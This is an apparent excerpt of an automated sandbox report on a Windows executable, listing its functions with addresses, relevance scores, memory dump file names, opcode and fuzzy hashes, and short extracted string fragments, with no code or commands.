                                                • Instruction ID: 9f19235cd7c95173104cc25451c8c49b90b160b8de831830ae06bdacbd301979
                                                • Opcode Fuzzy Hash: 677a04d54593f28023c93bcf9b6fa69eef5f8503c591345dc315b4b68ef5763c
                                                • Instruction Fuzzy Hash: 48C2523660DB8A82DB749A15E4D436EEBA0F788B90F904537DE8D87B64DE3CD480CB51
                                                Function 00007FF7D50C5B80 Relevance: 20.9, Strings: 15, Instructions: 2162COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 9sJZ$9sJZ$>(q$>(q$>(q$>(q${bC$|bC$|bC$Ap1$Ap1$h,]$h,]$/$/
                                                • API String ID: 0-1954784225
                                                • Opcode ID: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
                                                • Instruction ID: 537ab423df62221f84e6de8eefb238b9e7dca5320d8b77b50263e63d2628df3a
                                                • Opcode Fuzzy Hash: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
                                                • Instruction Fuzzy Hash: 5323CC36A0C68687EA745A38E09037EE691EF87B50FE44137DE9D87B94CE3CE4408765
                                                Function 00007FF7D50B5860 Relevance: 19.8, Strings: 15, Instructions: 1053COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: -DR$-DR$-g-$.g-$.g-$NJ"$OJ"$OJ"$j.um$k.um$k.um$;'J$;'J$;'J$;'J
                                                • API String ID: 0-3506230456
                                                • Opcode ID: bc74c7d2337a77b87f9c4cc6c756059029d88aff56a9a384d9a8e3852fcf087e
                                                • Instruction ID: 90f2565058e417a18c0a9c4a546113de49ac69164d751a49ac760a4bccf0c2f3
                                                • Opcode Fuzzy Hash: bc74c7d2337a77b87f9c4cc6c756059029d88aff56a9a384d9a8e3852fcf087e
                                                • Instruction Fuzzy Hash: B0A2A626E0C7818BEB759628A4C037EBB90EB59B50FD00537EE9ED7795DE2CE4408B11
                                                Function 00007FF7D5083AD0 Relevance: 18.5, Strings: 14, Instructions: 993COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ]_v$]_v$]_v$]_v$[f'$\f'$\f'$t?^$t?^$0s$0s$0s$1Uj$1Uj
                                                • API String ID: 0-4198073719
                                                • Opcode ID: c78530b5680eed8adb9f8cce8b6f42d42568307f5cb8be227e7c879298c30e64
                                                • Instruction ID: c2e01a9ae68282d9ddc771e4fbcc9c38b4085b5a9da9ef8680dcfecb00b00e89
                                                • Opcode Fuzzy Hash: c78530b5680eed8adb9f8cce8b6f42d42568307f5cb8be227e7c879298c30e64
                                                • Instruction Fuzzy Hash: 4E920C75B0D2414BE678B63868A0A7DEA98DF94BD0FD4013BEF5E87BD4C92CE8404B51
                                                Function 00007FF7D508B6A0 Relevance: 17.5, Strings: 13, Instructions: 1290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )q$*q$*q$?c$?c$PF&+$PF&+$WKn'$XKn'$XKn'$a<i$b<i$b<i
                                                • API String ID: 0-253853581
                                                • Opcode ID: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
                                                • Instruction ID: b8698366c74c2a6c9d2f8840d46be5d324b69559675d309b3a23110ce9d7e1fd
                                                • Opcode Fuzzy Hash: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
                                                • Instruction Fuzzy Hash: D2C2D732E09685CBEB74AA3998807FD7AA0FB14B54FE04937DE1DCB7A4CE28D5418351
                                                Function 00007FF7D50A04D0 Relevance: 17.1, Strings: 13, Instructions: 835COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0we$1we$1we$1we$3u`m$4u`m$4u`m$4u`m$4u`m$QMea$QMea$kxgK$kxgK
                                                • API String ID: 0-554904181
                                                • Opcode ID: 48a5c10513bfd21b36533462e936af4385beb86961b8c0932769a17666ec91af
                                                • Instruction ID: e76aedddc20856c9f96c8dc209d344b55769b724892281a8a31c8db51da366b5
                                                • Opcode Fuzzy Hash: 48a5c10513bfd21b36533462e936af4385beb86961b8c0932769a17666ec91af
                                                • Instruction Fuzzy Hash: 96721D22E1D686C7EA749738A19027FE2D09B54B91FE05933DD4DC7BA4DE2CE8409731
                                                Function 00007FF7D507BAB0 Relevance: 16.1, Strings: 12, Instructions: 1108COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C\!N$C\!N$Tm].$Tm].$Z]N$Z]N$Z$Z$vector too long$yXF$zXF$zXF
                                                • API String ID: 0-2263072351
                                                • Opcode ID: 206872c827cbfe06092a8a397020922f12d45322a087cae15547e1b943b2fa45
                                                • Instruction ID: b56cfb3751f086fb8a4e94a09ebc3151f3f527b977b4187a31a729b8d773ce28
                                                • Opcode Fuzzy Hash: 206872c827cbfe06092a8a397020922f12d45322a087cae15547e1b943b2fa45
                                                • Instruction Fuzzy Hash: C7A2CC36A0C68587DA749738A4917BEA790EB95B40FE04137EDDDC77A8DE2CEC408B11
                                                Function 00007FF7D50BF370 Relevance: 12.7, Strings: 9, Instructions: 1495COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,)W$-)W$-)W$Liz $Miz $Miz $iq*$iq*$iq*
                                                • API String ID: 0-548768203
                                                • Opcode ID: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
                                                • Instruction ID: a3cf3392bc741ea965d3b142e1dd1deb366fe6b80e3ffa1a250f88f56e6d5e96
                                                • Opcode Fuzzy Hash: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
                                                • Instruction Fuzzy Hash: 0AE2A635A0DB8583EB74962DA0D437EA6A0E789B54FE05537DE8DC7B98CF2CD4408B12
                                                Function 00007FF7D50BB020 Relevance: 12.6, Strings: 9, Instructions: 1361COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !cH$!cH$invalid hash bucket count$n.P'$n.P'$tcD$tcD$~hP$~hP
                                                • API String ID: 0-2997982297
                                                • Opcode ID: 371beb06c535d3b50fe6b93fd2ad4316a0ef0bbb543f4400f09f43fed1dad634
                                                • Instruction ID: a01d7188aba76ee9da55ba4f98206ded8edc6941f62393674f68abe67a447ecd
                                                • Opcode Fuzzy Hash: 371beb06c535d3b50fe6b93fd2ad4316a0ef0bbb543f4400f09f43fed1dad634
                                                • Instruction Fuzzy Hash: 02D2B53661C68687DB789625A0E037FB661EBD4B40FA0403BDE9F47B98DE2DD4408B52
                                                Function 00007FF7D50B3E80 Relevance: 12.6, Strings: 9, Instructions: 1321COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h1$h1$(qk$)qk$)qk$,VT$,VT$bGI$bGI
                                                • API String ID: 0-3994866152
                                                • Opcode ID: 5f0aded68d93b38d3c0cdba68b69595bf087ed76d83e8bf942bde98cdc35d4ce
                                                • Instruction ID: 5aab4461f6f4bbc788f1439e9f36fb9e98144440bcbcb92575e2789772472ecd
                                                • Opcode Fuzzy Hash: 5f0aded68d93b38d3c0cdba68b69595bf087ed76d83e8bf942bde98cdc35d4ce
                                                • Instruction Fuzzy Hash: CED20922A1C78183EB749B28A08137EBBA1E794B54FD04633EE9D87B94DF3DD5808711
                                                Function 00007FF7D50D5D40 Relevance: 11.9, Strings: 9, Instructions: 654COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ) )~$) )~$*TZ%$*TZ%$7ZX$7ZX$_^|$_^|$_^|
                                                • API String ID: 0-1291360158
                                                • Opcode ID: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
                                                • Instruction ID: c2ff9f1427bc6a104d55c6989fa832c6ee2fd0f171f41a8b3e6e2ffa1eb7acd4
                                                • Opcode Fuzzy Hash: 0c4d4502c6196317015b94aea25025952d428ed83f28c07abe1ef988d46b9726
                                                • Instruction Fuzzy Hash: 3A42BB21B0C6C287EA789A3C549423EB290AF54B51FE4413BED6F87FD5CE6DE8404B61
                                                Function 00007FF7D5073E30 Relevance: 11.9, Strings: 9, Instructions: 605COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "($"($@N[$@N[$@N[$@N[$CEj'$DEj'$DEj'
                                                • API String ID: 0-2996620231
                                                • Opcode ID: f28b6044c619f726cc9ad03304f5b7935733e316f4ad705018a347a370ebd92c
                                                • Instruction ID: 0711b227ef2ac6b3c3bec435d0cc659e62a09376315bcc7265e20d74274f041a
                                                • Opcode Fuzzy Hash: f28b6044c619f726cc9ad03304f5b7935733e316f4ad705018a347a370ebd92c
                                                • Instruction Fuzzy Hash: 7D329522A0C64687FA749A38A44477EA395AB45B90FF04537EDDDC7BD4CE2CE8418B13
                                                Function 00007FF7D50E16C0 Relevance: 10.6, Strings: 8, Instructions: 580COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: bS$2s$2s$2s$2s$_.K*$`.K*$`.K*
                                                • API String ID: 0-1048334069
                                                • Opcode ID: dff51098be40e6222de2caf7d6c0a4fd04d9c58727a1f9a2fbde2c55e4c53bfa
                                                • Instruction ID: eeb4ed2d657895463f6ce395ec21cbd211e6c27d77c0efe225ee617577779e48
                                                • Opcode Fuzzy Hash: dff51098be40e6222de2caf7d6c0a4fd04d9c58727a1f9a2fbde2c55e4c53bfa
                                                • Instruction Fuzzy Hash: 4C32EB36A0C64987EA746639918027EE6A2AB55F90FF40537EEDDC77D4CE3CE4408711
                                                Function 00007FF7D50E3F20 Relevance: 10.5, Strings: 8, Instructions: 480COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,wJ[$-wJ[$-wJ[$Qz%a$Qz%a$S; 9$S; 9$|O
                                                • API String ID: 0-1154477612
                                                • Opcode ID: fe857138256265a509485d277373485d5227e5001fa8a0a2808a081bcbb9ba69
                                                • Instruction ID: 42fde5e19c95e40b47e03081d930a276b6b3aeedf26c7eeb6925932c90bc1921
                                                • Opcode Fuzzy Hash: fe857138256265a509485d277373485d5227e5001fa8a0a2808a081bcbb9ba69
                                                • Instruction Fuzzy Hash: 3002076390C14B87EA345938914503EFEA697C0BA0FFA5173EE5A177A8CB3CFC454A91
                                                Function 00007FF7D5075910 Relevance: 10.4, Strings: 8, Instructions: 355COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: &(m$&(m$A6M$A6M$A6M$s^yY$t^yY$t^yY
                                                • API String ID: 0-425518891
                                                • Opcode ID: f9433a43340ef83df0adc0c2ea3ce5815cb0aae5f7e4af9d6a4aa5c0eee62a57
                                                • Instruction ID: 50859ee7a0ee9d3739eec3f774ae930e2a8ba71af52fea449406e19b3223afce
                                                • Opcode Fuzzy Hash: f9433a43340ef83df0adc0c2ea3ce5815cb0aae5f7e4af9d6a4aa5c0eee62a57
                                                • Instruction Fuzzy Hash: C5C19A2792C48147A76F8E35955027EB6817384FB0FC4A22AEE9F537D0CE7CDE428A51
                                                Function 00007FF7D5070050 Relevance: 9.7, Strings: 7, Instructions: 941COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (W,$(W,$(W,$Wq.F$Wq.F$zZ-$zZ-
                                                • API String ID: 0-1973832573
                                                • Opcode ID: 4fa37ac8f7acd6c0d8555323812b9fc3c6616a655d0f7508d89b2a075c38990e
                                                • Instruction ID: 2a296df43d4c2b8dcd4756826e93808b87970b22bf190287404b7ce6c4d35b21
                                                • Opcode Fuzzy Hash: 4fa37ac8f7acd6c0d8555323812b9fc3c6616a655d0f7508d89b2a075c38990e
                                                • Instruction Fuzzy Hash: AB82C666B0C78647DA749634A0A077EA790AB84B61FE08233EEDDC77D4DE2DE4404F51
                                                Function 00007FF7D5091880 Relevance: 9.6, Strings: 7, Instructions: 881COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: uLh$ uLh$ uLh$[t!:$[t!:$[t!:$[t!:
                                                • API String ID: 0-874898717
                                                • Opcode ID: 5e0a50c2ee5c35c28fccc85bbf1bb913c022d5b21abb8f6da954ffe1541928b0
                                                • Instruction ID: fc85f3138746515f7f9238d2015633cbe2d379c35aa4be743b203959856ade73
                                                • Opcode Fuzzy Hash: 5e0a50c2ee5c35c28fccc85bbf1bb913c022d5b21abb8f6da954ffe1541928b0
                                                • Instruction Fuzzy Hash: B782D636B0D68787DA749739A09027EE291AB89B90FE84533ED9DD7798CE3CD4408F11
                                                Function 00007FF7D50A9550 Relevance: 9.4, Strings: 7, Instructions: 652COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: A)an$B)an$B)an$R>t0$R>t0$h @m$h @m
                                                • API String ID: 0-2014293124
                                                • Opcode ID: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
                                                • Instruction ID: 2f498f1d05e1dd4b4e0d86bf85bbe44e85b99658da5c21de18f4359772ead42a
                                                • Opcode Fuzzy Hash: a952c9efa5565efe295c4d81218c6562816acb387cb051f672b544dc10768fb4
                                                • Instruction Fuzzy Hash: F752D666A0C19187FA249E35920023EEE90A754F54FD5C433DE5B33798EA7DE841CBB1
                                                Function 00007FF7D5075ED0 Relevance: 8.1, Strings: 6, Instructions: 617COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 9fO$m~MK$m~MK$Tv$Tv$Tv
                                                • API String ID: 0-219908125
                                                • Opcode ID: 00c47b21b9d8a3baaef8510b81e142f883ad99dbf64240025ea6ed929df38376
                                                • Instruction ID: 3a9275c2c0ea145128b4e4ca84ca03351ff7614a7f82435478920468468581a4
                                                • Opcode Fuzzy Hash: 00c47b21b9d8a3baaef8510b81e142f883ad99dbf64240025ea6ed929df38376
                                                • Instruction Fuzzy Hash: 17421922A0C54687EA7C663450A417EE7D5AF81B04FF4053BEDEF47AE8CD2DE8418B21
                                                Function 00007FF7D50C1700 Relevance: 8.0, Strings: 6, Instructions: 452COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: M"$M"$M"$eN'$fN'$fN'
                                                • API String ID: 0-299084768
                                                • Opcode ID: 17f3616fc0963ea9cf3f3ee8fb239ba1953bc571f74850901a194704eb31bcbc
                                                • Instruction ID: 8706b9f5064fd198655dbe0262183dd535fd7aaa7e5ca28ac108b6477fde360d
                                                • Opcode Fuzzy Hash: 17f3616fc0963ea9cf3f3ee8fb239ba1953bc571f74850901a194704eb31bcbc
                                                • Instruction Fuzzy Hash: 3212F935A0C64287EA785634A19437EE6A2DF92B54FE0023BEE5F47BD4CE3CD8418B11
                                                Function 00007FF7D50DC230 Relevance: 7.7, Strings: 5, Instructions: 1434COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DV$C:\Users\user\AppData\Local\Temp\C9F5.exe$jsx6$ksx6$ksx6
                                                • API String ID: 0-1762011659
                                                • Opcode ID: 1d23c07042c6ce4f6880151f9bc50497c94753d57e86f9ce995a9aa16bbd1d7d
                                                • Instruction ID: 14655cb0e44051220071cf0ea14a7f41fef17bcf411a0fa0e9e232c4f044ea8b
                                                • Opcode Fuzzy Hash: 1d23c07042c6ce4f6880151f9bc50497c94753d57e86f9ce995a9aa16bbd1d7d
                                                • Instruction Fuzzy Hash: EBE22727908AC18EDB785F3548A02FC77A0EB45B49F98013BDE9E4EFD5CE28D6418761
                                                Function 00007FF7D50A3150 Relevance: 7.2, Strings: 5, Instructions: 940COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2903742108.00007FF7D5061000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7D5060000, based on PE: true
                                                • Associated: 00000007.00000002.2903723199.00007FF7D5060000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903826444.00007FF7D50ED000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000007.00000002.2903863277.00007FF7D5152000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_7ff7d5060000_C9F5.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5n!$5n!$uc[$vc[$vc[
                                                • API String ID: 0-468549941
                                                • Opcode ID: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
                                                • Instruction ID: f82b1d3692d811051b44742fd9417979f2ef0470e0e75103bbd6b944954f517b
                                                • Opcode Fuzzy Hash: d689dfdf6a0b0cb9c1b3688676b1d608ce7ada2b7317cd4df454248670db6ae6
                                                • Instruction Fuzzy Hash: 5082ED36A0C68287EA749639A5806FEE394EB85F90FE04537DD5DC7794DE2CE8804B31
                                                Function 00007FF7D50BE430 Relevance: 7.1, Strings: 5, Instructions: 809COMMON
                                                Download Yara Rule
